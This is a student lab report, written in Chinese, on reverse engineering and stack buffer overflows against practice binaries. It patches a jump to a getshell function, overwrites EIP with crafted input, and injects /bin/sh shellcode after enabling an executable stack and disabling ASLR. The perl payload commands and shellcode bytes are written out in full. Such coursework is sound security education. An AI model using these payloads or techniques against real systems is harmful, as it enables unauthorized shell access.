实验一 逆向与Bof基础
一、直接修改程序机器指令,改变程序执行流程
使用 objdump -d pwn1
对pwn1文件进行反汇编。
可知main函数跳转至foo函数,先要使main函数跳转至getshell函数,即修改返回地址。
首先使用vi查看器查看pwn1文件,并使用 %!xxd
转换为十六进制查看:
利用 “:e8 d7”查找到需要修改的目标;
将“e8 d7”改为“e8 c3”。
使用 %!xxd -r
将文件转换回原文件,保存退出后,再次反汇编进行查看。
此时,main函数返回地址被修改至getshell函数。
二、通过构造输入参数,造成BOF攻击,改变程序执行流
先使用gdb对pwn2文件进行调试:
接下来对函数进行输入数据的测试,意图找到eip中存在4位数。
输入测试数据“1111111122222222333333334444444455555555”,并使用 info r
查看堆栈指令:
此时,eip中存放的是35353535,35是5的ascii码值。
再次输入测试数据“1111111122222222333333334444444412345678”,并使用 info r
查看:
此时eip中存放34333231,即4321。
使用 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
进行输入,再使用 xxd input
查看文件的十六进制:
三、注入Shellcode并执行
首先先做实验准备,先利用 apt-get install execstack
下载··execstack··。
输入命令:
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space
构造输入: perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
其中,\x4\x3\x2\x1为溢出到eip的部分,也就是要修改为shellcode的首地址。
输入 (cat input_shellcode;cat) | ./pwn2
,运行pwn2,然后打开顶一个终端,输入 ps -ef | grep pwn2
找到pwn2的进程号
利用进程号进入gdb调试:
输入 disassemble foo
查看foo的栈地址:
输入 break *0x080484a5
设置断点,并continue。
然后输入info r,查看栈的地址;
然后输入x/32x 0xffffd35c,并不断修改范围,寻找01020304;
之后在01020304的地址上加4,即d3 5c加4,使其覆盖之后的返回地址。
即填充 perl -e 'print "A" x 32;print "\x60\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
指令。
至此,覆盖成功。
实验成功。